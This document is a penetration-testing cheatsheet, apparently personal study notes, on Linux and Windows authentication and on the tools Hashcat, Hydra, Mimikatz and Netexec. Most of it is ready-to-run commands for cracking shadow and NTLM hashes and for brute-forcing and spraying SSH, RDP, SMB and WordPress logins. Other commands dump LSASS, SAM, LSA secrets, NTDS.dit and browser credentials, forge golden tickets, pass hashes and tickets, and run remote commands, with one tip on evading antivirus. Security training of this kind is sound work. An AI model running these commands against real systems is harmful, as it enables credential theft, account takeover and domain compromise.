9 - Notes

Nice General Cheatsheets

Authentication Process - Linux

1. Core Architecture: PAM

Pluggable Authentication Modules (PAM) manage the authentication, session setup, and password changes.

  • Key Module: pam_unix.so (Standard Unix auth).
  • Location: /usr/lib/x86_64-linux-gnu/security/
  • Function: Bridges the gap between user input (e.g., passwd command) and flat files (/etc/passwd, /etc/shadow).

2. Critical Files & Storage

A. The User Registry (/etc/passwd)

  • Permissions: World-Readable.
  • Format: Username:Password:UID:GID:GECOS:Home:Shell
  • Key Fields:
    • Password (x): Indicates the hash is actually in /etc/shadow.
    • Exploit: If writeable, deleting the x removes the password requirement for that user (e.g., root::0:0... allows passwordless login).

B. The Secrets (/etc/shadow)

  • Permissions: Root-Readable only.
  • Format: Username:Hash:LastChange:Min:Max:Warn:Inactive:Expire:Reserved
  • Status Flags:
    • ! or *: Account is locked (cannot login via password).
    • Note: SSH Key auth or su might still work even if locked.

C. Password History (/etc/security/opasswd)

  • Permissions: Root-Readable.
  • Function: Stores previously used password hashes to enforce history policies (prevent reuse).
  • Value: Often contains older, weaker hashes (MD5) useful for pattern analysis.

3. Hash Formats & Algorithms

Linux hashes follow the format: $<id>$<salt>$<hash>

IDAlgorithmNotes
$1$MD5Weak. Fast to crack.
$2a$BlowfishSlower (Bcrypt).
$5$SHA-256Standard.
$6$SHA-512Standard / Strong.
$y$YescryptModern Default (Debian/Kali). Harder to crack.
$7$ScryptMemory hard.

4. Cracking Workflow

1. Prepare the File (Unshadow) Combine passwd and shadow to give the cracker the necessary context (Usernames, GECOS, and Hash).

# Syntax: unshadow <PASSWD_FILE> <SHADOW_FILE>
unshadow /etc/passwd /etc/shadow > unshadowed.hashes

2. Crack (Hashcat)

  • Format: SHA-512 (Mode 1800) is the most common legacy default.
hashcat -m 1800 -a 0 unshadowed.hashes rockyou.txt

3. Crack (John the Ripper)

  • Mode: --single is highly effective here because unshadow provides the GECOS fields for guessing.
john --single unshadowed.hashes

Authentication Process - Windows

Authentication Process - Windows Authentication Process - Windows

1. Key Processes & Architecture

WinLogon (WinLogon.exe)

  • Role: The “orchestrator.” Intercepts keyboard input (Ctrl+Alt+Del), manages the workstation lock status, and handles password changes.
  • Workflow: Launches LogonUI -> Collects Creds -> Sends to LSASS.
  • Legacy Note (GINA): In older Windows (NT/XP), msgina.dll handled this. Replaced by Credential Providers in modern Windows.

LogonUI (LogonUI.exe)

  • Role: The graphical user interface that asks for the password.
  • Mechanism: Uses Credential Providers (COM Objects/DLLs) to accept different auth types (Password, PIN, Biometrics).

LSASS (%SystemRoot%\System32\Lsass.exe)

  • Role: The “Gatekeeper.” Enforces security policy, validates the password against SAM/AD, and writes to the Event Log.
  • Resources: Microsoft: LSA Architecture

2. Authentication DLLs (The Packages)

These modules live inside LSASS to handle specific tasks.

DLL NameFunction / Description
Lsasrv.dllThe Manager. Enforces policy and chooses the protocol (Negotiate: Kerberos vs NTLM).
Msv1_0.dllLocal / NTLM. Handles non-domain logins and legacy NTLM authentication.
Kerberos.dllDomain. Handles Kerberos ticket requests and validation.
Samsrv.dllSAM Interface. Talks to the local SAM database.
Netlogon.dllNetwork. Handles the secure channel for network logons.
Ntdsa.dllAD Interface. Used to create/manage records in the Registry or AD.

3. Credential Storage Locations

Local Users (SAM)

  • File Path: %SystemRoot%\system32\config\SAM
  • Registry Mount: HKLM\SAM
  • Protection: Partially encrypted by SYSKEY (syskey.exe) to prevent offline extraction.
  • Content: Local user NTLM/LM hashes.
Registry HiveDescription
HKLM\SAMContains password hashes for local user accounts. These hashes can be extracted and cracked to reveal plaintext passwords.
HKLM\SYSTEMStores the system boot key, which is used to encrypt the SAM database. This key is required to decrypt the hashes.
HKLM\SECURITYContains sensitive information used by the Local Security Authority (LSA), including cached domain credentials (DCC2), cleartext passwords, DPAPI keys, and more.

Domain Users (NTDS)

  • File Path: %SystemRoot%\ntds.dit
  • Location: Found only on Domain Controllers.
  • Content: Active Directory database (Users, Groups, Computers, GPOs, Hashes).
  • Sync: Replicates to all DCs (except Read-Only DCs).

Credential Manager (The Vault)

  • Role: Stores saved passwords for RDP, Websites, and Network Shares.
  • Policy.vpol in File Path:
  • %UserProfile%\AppData\Local\Microsoft\Vault\
  • %UserProfile%\AppData\Local\Microsoft\Credentials\
  • %UserProfile%\AppData\Roaming\Microsoft\Vault\
  • %ProgramData%\Microsoft\Vault\
  • %SystemRoot%\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault\

Windows Credential Manager Windows Credential Manager

Hashcat

Hashcat is a fast password recovery tool that supports multiple attack modes and hash types. It’s the world’s fastest and most advanced password recovery utility.

References:

Basic Usage

# Basic syntax
hashcat -m <HASH_MODE> -a <ATTACK_MODE> <HASH_FILE> <WORDLIST>

# Common flags
-m <MODE>     : Hash type mode (see hash types below)
-a <MODE>    : Attack mode (0=straight, 1=combinator, 3=brute-force/mask, 6=hybrid wordlist+mask)
-r <RULE>    : Rule file for rule-based attack
--force      : Ignore warnings (use with caution)
--stdout     : Output to stdout instead of cracking
-w <LEVEL>   : Workload profile (1-4, higher = faster but more resource intensive)
-O            : Optimized kernels (limits password length)

Attack Modes

ModeDescriptionExample
0Straight (Dictionary)hashcat -a 0 -m 1000 hash.txt wordlist.txt
1CombinatorCombines words from two wordlists
3Brute-Force/Maskhashcat -a 3 -m 1000 hash.txt ?a?a?a?a?a?a
6Hybrid Wordlist + MaskWordlist + mask pattern

Common Hash Types & Modes

Windows Hashes

# NT hashes (NTLM)
hashcat -m 1000 <HASHES> <WORDLIST>

# PBKDF2 (DCC2 hashes for domain - cached domain credentials)
hashcat -m 2100 <HASHES> <WORDLIST>

Linux Hashes

# SHA-512crypt (most common legacy default)
hashcat -m 1800 hashes.txt <WORDLIST>

# MD5crypt (with salt)
hashcat -m 20 <HASH>:<SALT> <WORDLIST>

Kerberos (Active Directory)

# Kerberoasting - RC4 encrypted TGS (Type 23)
hashcat -m 13100 spn_tickets.txt <WORDLIST>

# Kerberoasting - AES-256 encrypted TGS (Type 18)
hashcat -m 19600 spn_tickets.txt <WORDLIST>

# Kerberoasting - AES-128 encrypted TGS (Type 17)
hashcat -m 19700 spn_tickets.txt <WORDLIST>

Other Hash Types

# Bitlocker
hashcat -a 0 -m 22100 hash_crackme_vhd.txt <WORDLIST>

# IPMI (HP iLO)
hashcat -m 7300 ipmi_hash.txt -a 3 ?1?1?1?1?1?1?1?1 -1 ?d?u
hashcat -m 7300 -w 3 -O "<HASH>" /usr/share/wordlists/rockyou.txt

Rule-Based Attacks

Rule-based attacks apply transformations to words in a wordlist, creating permutations and variations.

Rule Files Location

# Default rule files location
/usr/share/hashcat/rules

Rule Comparison Table

Rule FileRule CountUse Case
best64.rule64First Run. Instant results for easy passwords.
d3ad0ne.rule~34,000Deep Crack. Good for standard “complex” user passwords.
dive.rule~100,000+Paranoid. Extremely slow; last resort for dictionary attacks.

Using Rules

# Apply rule file to wordlist
hashcat -m 1800 -r /usr/share/hashcat/rules/best64.rule hashes.txt <WORDLIST>

Creating Custom Rules

Common rule transformations:

RuleDescriptionExample
cCapitalize first character, lowercase restpassword โ†’ Password
CLowercase first character, uppercase restpassword โ†’ pASSWORD
tToggle case of all characterspassword โ†’ PASSWORD
$!Append ! to endpassword โ†’ password!
$1$9$9$8Append 1998 to endpassword โ†’ password1998
sa@Replace all a with @password โ†’ p@ssword
so0Replace all o with 0password โ†’ passw0rd
ss$Replace all s with $password โ†’ pa$$word

Example Custom Rule File:

cat << EOF > custom.rule
c
C
t
\$!
\$1\$9\$9\$8
\$1\$9\$9\$8\$!
sa@
so0
ss\$
EOF

# Generate permutated wordlist
hashcat --force -r custom.rule keywords.txt --stdout | sort -u > wordlist.txt

# Crack hash with custom rule
hashcat -a 0 -m <HASH_ID> -r custom.rule <HASH> wordlist.txt

Mask Attacks (-a 3)

Mask attacks use placeholders to define character sets and patterns for brute-force attacks.

Charset Symbols

SymbolDescriptionCharset / Definition
?lLowercaseabcdefghijklmnopqrstuvwxyz
?uUppercaseABCDEFGHIJKLMNOPQRSTUVWXYZ
?dDigits0123456789
?hHex (Lower)0123456789abcdef
?HHex (Upper)0123456789ABCDEF
?sSpecialยซspaceยป!"#$%&’()*+,-./:;<=>?@[]^_{`
?aAll?l?u?d?s
?bBinary0x00 - 0xff

Custom Charsets

# Define custom charset with -1, -2, -3, -4
# -1 ?d?u means charset 1 = digits + uppercase
hashcat -a 3 -m 7300 hash.txt ?1?1?1?1?1?1?1?1 -1 ?d?u

Mask Examples

# Pattern: 1 uppercase, 4 lowercase, 1 digit, 1 special
hashcat -a 3 -m <HASH_ID> <HASH> '?u?l?l?l?l?d?s'

# 8 characters: digits or uppercase
hashcat -a 3 -m 7300 hash.txt ?1?1?1?1?1?1?1?1 -1 ?d?u

Hash Identification

Before cracking, identify the hash type:

# Use hashid to identify hash and get hashcat mode
hashid -jm '<HASH>'

# Alternative: online tool
# https://hashes.com/en/tools/hash_identifier

Common Hash Values

Hash ValueTypeMeaning
d41d8cd98f00b204e9800998ecf8427eMD5Empty String (0 byte input)
da39a3ee5e6b4b0d3255bfef95601890afd80709SHA1Empty String (0 byte input)
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855SHA256Empty String (0 byte input)

Workflow Examples

Linux Password Cracking

# 1. Prepare unshadowed file
unshadow /etc/passwd /etc/shadow > unshadowed.hashes

# 2. Crack with hashcat (SHA-512, mode 1800)
hashcat -m 1800 -a 0 unshadowed.hashes rockyou.txt

Kerberoasting

# 1. Get TGS tickets
impacket-GetUserSPNs -dc-ip <DC_IP> <DOMAIN>/<USER> -request -outputfile spn_tickets.txt

# 2. Crack TGS (RC4, most common)
hashcat -m 13100 spn_tickets.txt <WORDLIST>

# 3. If AES-256, use mode 19600
hashcat -m 19600 spn_tickets.txt <WORDLIST>

Windows NT Hashes

# Extract hashes from SAM
impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

# Crack NT hashes
hashcat -m 1000 <HASHES> <WORDLIST>

Important Notes

  • Hash Mode: Always specify the correct -m mode for your hash type. Use hashid or check the hash format to determine the mode.
  • Wordlists: Common wordlists include rockyou.txt, SecLists, and custom wordlists generated from OSINT.
  • Rules: Start with best64.rule for quick results, then move to more comprehensive rules if needed.
  • Performance: Use -w 3 or -w 4 for faster cracking (uses more resources). Use -O for optimized kernels (may limit password length).
  • GPU Acceleration: Hashcat automatically uses GPU if available. Ensure proper drivers are installed.
  • Resume Sessions: Hashcat saves progress automatically. Use --restore to resume interrupted sessions.
  • Output: Cracked passwords are saved to ~/.hashcat/hashcat.potfile by default.

Hydra

Hydra is a parallelized login cracker that supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add.

Core Flags

-f      : Stop immediately when a credential is found
-V      : Verbose (Check if service is responding)
-t <N>  : Number of parallel tasks (threads)
-l <USER> : Single username
-L <USER_LIST> : Username list file
-p <PASSWORD> : Single password
-P <WORDLIST> : Password wordlist file
-o <OUTPUT> : Output file

Protocol-Specific Examples

SSH / FTP / RDP / SMB

# SSH brute-force; -t 4 is recommended for SSH (ONLINE - use small wordlist)
hydra -t 4 -l <USER> -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ssh://<TARGET>:<PORT> -f -V -o hydra_ssh_login.txt

# FTP brute-force
hydra -l <USER> -P <WORDLIST> -f -V ftp://<TARGET>

# RDP brute-force
hydra -l <USER> -P <WORDLIST> -f -V rdp://<TARGET>

# SMB brute-force
hydra -l <USER> -P <WORDLIST> -f -V smb://<TARGET>

Web Forms (HTTP-POST)

Syntax: "/path:body:F=FailureString"

  • Use ^USER^ and ^PASS^ as placeholders
  • Check Burp Suite for body structure
  • F=FailureString specifies the failure response text to detect failed logins
# Web Login brute-force (ONLINE - use small wordlist to avoid lockouts)
hydra -t 16 -l <USER> -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt <TARGET> http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -VF -o hydra_web_login.txt

# Generic web form
hydra -l <USER> -P <WORDLIST> <TARGET> http-post-form "/login.php:user=^USER^&pass=^PASS^:F=Invalid password" -V -f

WordPress Specific

# WordPress brute-force login form with a complex request string (ONLINE - use small wordlist)
hydra -t 16 -l <USER> -P /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt <TARGET> http-post-form '/wp-login.php:log=^USER^&pwd=^PASS^:F=Invalid username' -VF -o hydra_wp_login.txt

# Alternative WordPress syntax
hydra -l <USER> -P <WORDLIST> <TARGET> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=Invalid username" -V -f

Password Spraying

Password spraying uses one password against many users (alternates users), which has no risk of account lockout compared to brute-forcing. This is useful as a “hail Mary” to find any way in!

Best practice: Obtain account lockout policy beforehand (via enumeration or asking customer); if you don’t know the password policy, a good rule of thumb is to wait a few hours between attempts, which should be long enough for the account lockout threshold to reset.

# SSH password spraying (1 password vs many users)
hydra -L <USER_LIST> -p '<PASSWORD>' -f -V -t 4 ssh://<TARGET>

# Web form password spraying
hydra -L <USER_LIST> -p '<PASSWORD>' -f -V <TARGET> http-post-form "/login:user=^USER^&pass=^PASS^:F=Invalid"

Important Notes

  • Account Lockout Risk: Brute-forcing (many passwords vs 1 user) has a RISK of account lockout due to account lockout policy. Use small wordlists and be cautious.
  • Thread Count: Use -t 4 for SSH to avoid overwhelming the service. Web forms can handle higher thread counts like -t 16.
  • Wordlist Selection: For online attacks, use small wordlists (e.g., top 1000 passwords) to minimize lockout risk and reduce time.
  • Output: Always use -o <OUTPUT_FILE> to save results for later analysis.

Mimikatz

Mimikatz is a post-exploitation tool that can extract plaintext passwords, hashes, PINs, and Kerberos tickets from memory. It can also perform pass-the-hash, pass-the-ticket, and build Golden Tickets.

Important Notes

  • Debug Privilege: Most Mimikatz operations require privilege::debug to access LSASS memory
  • Administrator Required: Mimikatz typically needs administrator privileges to function
  • LSASS Access: Many operations read from LSASS memory, which is protected by Windows
  • Detection: Mimikatz is heavily flagged by security products and EDR solutions
  • Pass the Hash: When using sekurlsa::pth, a new window will open - run commands in that new window
  • Golden Tickets: Golden Tickets are valid until the KRBTGT account password is changed (typically 180 days by default)
  • Ticket Files: Exported Kerberos tickets use .kirbi format
  • Domain Syntax: Use “.” for domain when targeting local machine accounts

Basic Usage & Privilege Escalation

# Launch Mimikatz (via SMB share)
\\tsclient\share\mimikatz.exe

# Enable debug privilege (required for most operations)
privilege::debug

# Elevate token to SYSTEM
token::elevate

# Write to console in bae64 (avoid AV flagging)
base64 /out:true

Credential Dumping

LSASS Memory (sekurlsa)

Dump All Credentials:

# VERBOSE: Dumps credentials from all providers (Kerberos, WDigest, MSV, etc.)
sekurlsa::logonpasswords

Dump Specific Hash Types:

# Dumps only LM/NTLM hashes
sekurlsa::msv

Export Kerberos Tickets:

# Avoid AV flagging
base64 /out:true

# Export Kerberos Tickets (TGT/TGS) to disk
sekurlsa::tickets /export
# $ : machine tickets (computers)
# @ : service tickets (users)

Extract AES Keys:

# Extract AES Keys for Pass the Key attacks
.\mimikatz.exe "privilege::debug" "sekurlsa::ekeys" exit

SAM Database

# Dumps local SAM database (local user hashes)
lsadump::sam

LSA Secrets

# Dumps LSA Secrets (cached domain credentials, service account passwords, etc.)
lsadump::lsa /patch

Dump Specific Account:

# Dump specific account (e.g., KRBTGT for Golden Ticket)
lsadump::lsa /inject /name:krbtgt

DCSync (Remote):

# Remotely dump account from Domain Controller
lsadump::dcsync /domain:<DOMAIN> /user:krbtgt

DCSync

Might require runas.

mimikatz.exe "privilege::debug" "lsadump::dcsync /domain:<DOMAIN> /user:<DOMAIN>\<USER>" exit

Pass the Hash (PtH)

Pass the Hash allows you to authenticate using an NTLM hash instead of a plaintext password.

# Use "." for domain if targeting local machine
# IMPORTANT: Run commands inside the NEW window that pops up
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:<USER> /ntlm:<PASS_HASH> /domain:<DOMAIN> /run:cmd.exe" exit

Alternative Syntax:

sekurlsa::pth /domain:<DOMAIN> /user:<USER> /ntlm:<HASH> /run:cmd.exe

Pass the Key (PtK) / OverPass the Hash (OtH)

Concept: Request a Kerberos Ticket (TGT) using an NTLM hash or AES Key, rather than using the NTLM protocol directly.

Extract AES Keys First:

.\mimikatz.exe "privilege::debug" "sekurlsa::ekeys" exit

Pass the Key with AES:

# Spawns a process. Windows will implicitly request TGT using the injected key/hash when network resources are accessed.
# Can use /ntlm, /aes128, or /aes256
sekurlsa::pth /domain:<DOMAIN> /user:<USER> /aes256:<AES256_KEY> /run:cmd.exe

Pass the Ticket (PtT)

Pass the Ticket allows you to use stolen Kerberos tickets to authenticate as another user.

Export Tickets:

# Export tickets from memory to .kirbi files
.\mimikatz.exe "privilege::debug" "sekurlsa::tickets /export" exit

Inject Ticket:

# Inject ticket into current session
.\mimikatz.exe "kerberos::ptt <TICKET_FILE.kirbi>" "misc::cmd" exit

Golden Ticket Attack

A Golden Ticket is a forged Kerberos TGT that allows you to impersonate any user in the domain, including domain administrators.

Step 1: Get KRBTGT Hash & SID

Method A (On DC):

lsadump::lsa /inject /name:krbtgt

Method B (Remote DCSync):

lsadump::dcsync /domain:<DOMAIN> /user:krbtgt

Step 2: Create & Inject Ticket

# /ptt immediately injects it into memory. /id:500 makes you fake-admin.
kerberos::golden /user:Administrator /domain:<DOMAIN> /sid:<SID> /krbtgt:<NTLM> /id:500 /ptt

Step 3: Launch Shell

# Launch shell (Optional, or just use current shell if /ptt was used)
misc::cmd

Credential Manager

Dump credentials stored in Windows Credential Manager:

\\tsclient\share\mimikatz.exe
privilege::debug
sekurlsa::credman

DPAPI (Data Protection API)

Decrypt data protected by Windows DPAPI, such as browser credentials:

mimikatz.exe
dpapi::chrome /in:"C:\Users\<USER>\AppData\Local\Google\Chrome\User Data\Default\Login Data" /unprotect

Netexec

Netexec (formerly CrackMapExec) is a swiss army knife for pentesting networks. It’s a network exploitation tool that helps automate assessing the security of large networks by providing tactics and techniques for testing security controls in an Active Directory environment.

Password Policy Enumeration

Enumerate password policy information via SMB:

# Anonymous password policy enumeration
netexec smb <TARGET> --pass-pol

# Authenticated password policy enumeration
netexec smb <TARGET> -u <USER> -p <PASS> --pass-pol

User Enumeration

Enumerate Users

# Enumerate users via SMB (anonymous or authenticated)
netexec smb <TARGET> --users

# Authenticated user enumeration
netexec smb <TARGET> -u "<USERNAME>" -p "<PASSWORD>" --users

Enumerate Groups

# Enumerate groups
netexec smb <TARGET> -u "<USERNAME>" -p "<PASSWORD>" --groups

# Find high value users (e.g., Domain Admins)
netexec smb <TARGET> -u <USER> -p <PASSWORD> --groups "Domain Admins"

Share Enumeration

# List available shares
netexec smb <TARGET> -u "<USERNAME>" -p "<PASSWORD>" --shares

Password Spraying

Password spraying uses one password against many users (alternates users), which has no risk of account lockout compared to brute-forcing. This is useful as a “hail Mary” to find any way in!

Best practice: Obtain account lockout policy beforehand (via enumeration or asking customer); if you don’t know the password policy, a good rule of thumb is to wait a few hours between attempts, which should be long enough for the account lockout threshold to reset.

# Check netexec -h for services
# Password spraying (many users vs 1 password)
netexec smb <TARGET> -u <USERS> -p <PASSWORD> | grep '+'

# Local authentication (tries local authentication instead of domain authentication)
# Mitigated with: https://learn.microsoft.com/en-us/windows-server/identity/laps/laps-overview
netexec smb <TARGET> -u <USERS> -p <PASSWORD> --local-auth | grep '+'

Pass the Hash (PtH)

Netexec supports pass-the-hash attacks for lateral movement:

# Target can also be a subnet (CIDR)
# -d . = Local Account | -d <DOMAIN> = Domain Account
# --local-auth forces local check if implied domain fails
# :<PASS_HASH> implies empty LM hash (LM:NT)
netexec smb <TARGET> -u <USER> -d . -H <PASS_HASH> --local-auth

# Domain account with hash
netexec smb <TARGET> -u <USER> -d <DOMAIN> -H <PASS_HASH>

Credential Dumping

LSA Secrets

Remotely dump LSA secrets from a target:

# Dump LSA secrets remotely
netexec smb <TARGET> --local-auth -u <USER> -p <PASSWORD> --lsa

SAM Database

Remotely dump SAM database secrets:

# Dump SAM secrets remotely
netexec smb <TARGET> --local-auth -u <USER> -p <PASSWORD> --sam

Active Directory Operations

Verify Credentials

# Verify credentials against a domain controller
netexec smb <DC_IP> -u <USER> -p <PASSWORD>

# Execute command with verified credentials
sudo netexec smb <DC_IP> -u <USER> -p <PASSWORD> -x '<COMMAND>'

NTDS.dit Extraction

Extract the NTDS.dit file (keys of the kingdom) from a domain controller:

# Extract NTDS.dit using ntdsutil module
netexec smb <TARGET> -u <ADMIN_USER> -p <PASSWORD> -M ntdsutil

LDAP Operations

Admin Count Enumeration

Find high-value users with adminCount=1 (includes Domain Admins, Enterprise Admins, Backup Operators, etc.):

# Enumerate users with adminCount=1 via LDAP
netexec ldap <TARGET> -u <USER> -p <PASSWORD> --admin-count

Command Execution

Command Execution (-x, -X) or Relaying: Sudo is REQUIRED because these operations act as a server/listener.

Execute commands on remote systems:

# Execute command on target
sudo netexec smb <TARGET> -u <USER> -p <PASSWORD> -x '<COMMAND>'

# Execute command with domain credentials
sudo netexec smb <DC_IP> -u <USER> -p <PASSWORD> -x '<COMMAND>'

Protocol Selection

Netexec supports multiple protocols. Check available services with:

netexec -h

Common protocols include:

  • smb - SMB/CIFS protocol
  • ldap - LDAP protocol
  • winrm - Windows Remote Management
  • ssh - SSH protocol
  • mssql - Microsoft SQL Server
  • And many more…